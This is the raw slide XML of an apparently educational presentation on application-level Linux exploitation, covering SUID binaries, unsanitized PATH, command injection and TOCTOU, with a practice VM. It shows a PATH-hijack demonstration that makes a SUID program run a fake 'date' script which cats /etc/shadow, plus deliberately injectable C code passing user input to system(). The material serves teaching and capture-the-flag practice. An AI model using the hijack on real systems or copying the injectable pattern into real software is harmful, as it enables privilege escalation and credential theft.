        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="90433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Unsanitized</a:t>
            </a:r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PATH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42527-6BBF-4BF7-873B-E1629AC8BDD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="1332904"/>
            <a:ext cx="11420475" cy="4135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bash$ cat /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tmp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/date</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU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#!/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="20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AU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/bin/cat /etc/shadow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bash$ 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chmod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777 /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tmp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/date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bash$ PATH=/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tmp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./vuln</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a: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  <a:t>root:*:17431:0:99999:7:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a: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  <a:t>daemon:*:17431:0:99999:7:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a: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  <a:t>bin:*:17431:0:99999:7:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a: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  <a:t>sys:*:17431:0:99999:7:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a: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  <a:t>sync:*:17431:0:99999:7:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a: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  <a:t>games:*:17431:0:99999:7:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a: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  <a:t>man:*:17431:0:99999:7:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7C80"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF7C8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78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Try for yourself!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4D933-7AE6-487D-AAA8-80AF0234EA58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="1332904"/>
            <a:ext cx="115252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the .ova at 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https://tinyurl.com/yyrnkww2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-A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(try Firefox)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your VM software you should be able to 'import' the .ova</a:t>
            </a:r>
            <a:b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Login/password is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3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guest:guest</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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A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(You can also SSH into the box if you have host/guest networking!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-A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 levels:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-A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1) Command injection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-A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2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2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Unsanitized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-A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PATH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-A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3) Integer overflow (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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bonus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-A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A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4) TOCTOU bug (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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bonus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-A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AU" sz="28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harder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-A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A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 them in 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/home/level1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-A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etc – flag is in the directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU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 code is given for each challenge (no binary reversing!)</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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1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level exploitation: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Stack overflow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after free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Race condition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DEP/ROP/ASLR/PIE/CFI etc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‘Application Level’?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="429119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level exploitation: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Stack overflow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after free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Race condition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DEP/ROP/ASLR/PIE/CFI etc</a:t>
            </a:r>
          </a:p>
          <a:p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level exploitation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="3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Unsanitized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PATH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 injection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of check/time of use bugs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‘Application Level’?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167069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E590D8-2CC3-4F8B-84F4-3364C75DEFEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="1332904"/>
            <a:ext cx="115252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level exploitation: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Stack overflow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after free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Race condition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DEP/ROP/ASLR/PIE/CFI etc</a:t>
            </a:r>
          </a:p>
          <a:p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level exploitation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="3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Unsanitized</a:t>
            </a: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PATH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 injection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of check/time of use bugs</a:t>
            </a:r>
          </a:p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can be exploited without low-level/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3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asm</a:t>
            </a:r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knowledge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‘Application Level’?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124231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SUID?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42527-6BBF-4BF7-873B-E1629AC8BDD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="1332903"/>
            <a:ext cx="11420475" cy="192520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2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include 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AU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#include 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AU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stdlib.h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AU" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-A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AU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    system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("/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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usr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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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whoami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AU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010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SUID?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42527-6BBF-4BF7-873B-E1629AC8BDD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="1332903"/>
            <a:ext cx="11420475" cy="192520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2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include 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AU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#include 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AU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stdlib.h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AU" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-A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AU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    system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("/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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usr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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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whoami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AU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F0E04-4E66-48EF-B4B6-1E77877D4EC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333372" y="3429000"/>
            <a:ext cx="11420475" cy="10448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2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bash$ ls –l</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rw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err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-x 1 root guest 8608 May 13 12:14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nosuid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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rw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latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-x 1 root guest 8608 May 13 12:14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suid</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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5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SUID?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42527-6BBF-4BF7-873B-E1629AC8BDD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="1332903"/>
            <a:ext cx="11420475" cy="192520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2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include 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AU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#include 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AU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stdlib.h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AU" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-A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AU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    system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("/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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usr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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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whoami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AU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F0E04-4E66-48EF-B4B6-1E77877D4EC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333372" y="3429000"/>
            <a:ext cx="11420475" cy="10448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2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bash$ ls –l</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rw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err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-x 1 root guest 8608 May 13 12:14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nosuid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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rw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latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-x 1 root guest 8608 May 13 12:14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suid</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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23418-A852-4DD9-B376-1B4E6A1FA84C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333371" y="4644728"/>
            <a:ext cx="11420475" cy="131218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2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bash$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nosuid</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU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guest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bash$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>suid</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU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root</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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7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0DD02D0-B5AD-438C-AC74-F43CF08B41C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="400050"/>
            <a:ext cx="11420475" cy="93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Command Injection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42527-6BBF-4BF7-873B-E1629AC8BDD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="2006352"/>
            <a:ext cx="11420475" cy="41014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2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include 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AU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#include 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AU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stdlib.h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main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-A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argc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**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argv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A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cmd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[512];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argc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!= 2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF66CC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return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snprintf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cmd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, 512, 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"/bin/echo '%s'"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argv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[1]) &gt;= 512) {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("Input too long!\n"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000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF66CC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return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system(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-A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cmd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AU" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF66CC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return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DB677-EFC3-4C9C-A313-97793931E6AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="1332904"/>
            <a:ext cx="1152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 the bug!</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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8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1209</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>214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jgbstephenson@gmail.com</dc:creator>
  <cp:lastModifiedBy>Adam Kues</cp:lastModifiedBy>
  <cp:revision>24</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-04-15T07:15:01Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-05-13T09:37:17Z</dcterms:modified>
</cp:coreProperties>
</file>